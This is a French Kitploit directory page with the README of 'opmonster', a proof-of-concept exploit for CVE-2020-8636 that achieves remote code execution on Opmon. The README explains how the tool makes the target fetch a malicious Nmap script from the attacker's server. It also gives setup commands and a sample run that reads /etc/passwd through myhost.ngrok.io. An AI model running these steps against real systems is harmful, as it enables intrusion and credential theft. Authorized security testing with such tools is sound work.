Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/phor3nsic/opmonster
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 exploit d'exécution de code à distance authentifié pour Opmon

Voir le dépôt
22il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

OpMonster

CVE-2020-8636 — exploit d'exécution de code à distance authentifié pour Opmon

À propos • Installation • Utilisation • Licence

language last commit license stars

OpMonster

À propos

OpMonster est un exploit proof-of-concept pour CVE-2020-8636, une vulnérabilité d'exécution de code à distance dans la plateforme de surveillance Opmon. Il abuse du point de terminaison nettools.php, qui permet d'exécuter Nmap avec des options arbitraires. L'exploit fait récupérer par Opmon un script Nmap malveillant depuis un serveur que vous contrôlez (via ), le place dans , puis l'exécute pour lancer votre commande sur la cible et affiche la sortie.

--script
.nse
http-fetch
/tmp

Découvert et développé par @phor3nsic. Plus de détails : Trois CVE sur Opmon.

Installation

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

Utilisation

D'abord, démarrez un serveur web sur un hôte accessible par la cible, dans un répertoire où le script .nse généré peut être téléchargé (l'exploit écrit le script dans le répertoire courant) :

root@kitploit:~
php -S 0.0.0.0:1337

Ensuite, exécutez l'exploit avec quatre arguments positionnels :

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
ArgumentDescription
HOSTURL de base Opmon cible (ex. https://vulnhost.com)
LHOSTHôte de votre serveur qui sert le script .nse
LPORTPort de votre serveur
CMDCommande à exécuter sur la cible

L'exploit s'arrête avec un message si la cible ne télécharge pas le script (« non vulnérable ») ou ne peut pas établir une connexion sortante vers votre serveur.

Avertissement

Pour des tests de sécurité autorisés et à des fins éducatives uniquement. Vous êtes responsable de l'utilisation que vous en faites.

Licence

MIT © phor3nsic

Télécharger l’outil